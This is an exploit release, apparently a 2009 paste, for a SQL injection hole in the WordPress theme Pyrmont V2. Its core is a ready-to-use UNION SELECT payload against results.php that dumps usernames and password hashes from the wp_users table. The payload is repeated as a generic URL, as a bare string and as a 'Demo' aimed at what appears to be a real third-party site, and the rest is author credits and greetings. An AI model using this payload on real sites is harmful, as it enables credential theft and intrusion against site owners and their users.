WordPress and Pyrmont V2. SQL Injection Vulnerability by h3m4n

VIEWS: 42 PAGES: 1

									                           WordPress and Pyrmont V2. SQL Injection Vulnerability                                  Page 1/1
  1    #############################################################
  2    # WordPress and Pyrmont V2. SQL Injection Vulnerability
  3
  4    # Plugin Home: http://wordpress.org/extend/themes/pyrmont−v2
  5
  6    # Author: Gamoscu
  7
  8    # Site: www.1923turk.biz
  9
  10   #   Site: http://gamoscu.wordpress.com/
  11
  12   ##############################################################
  13
  14
  15
  16
  17   # Exploit:
  18   http://server/path/results.php?id=−9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13
       ,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
  19
  20              −9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
       1,22,23,24+from+wp_users
  21
  22
  23   # Demo: http://cc.cc.moose.cc/maps/results.php?id=−9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7
       ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
  24
  25   ##############################################################
  26   # Greetz: Manas58 Baybora Delibey Tiamo Psiko
  27   ##############################################################
  28
  29
  30   Vatan Lafla Deðil Eylemle Sevilir




Gamoscu                                                                                                            12/18/2009

								
To top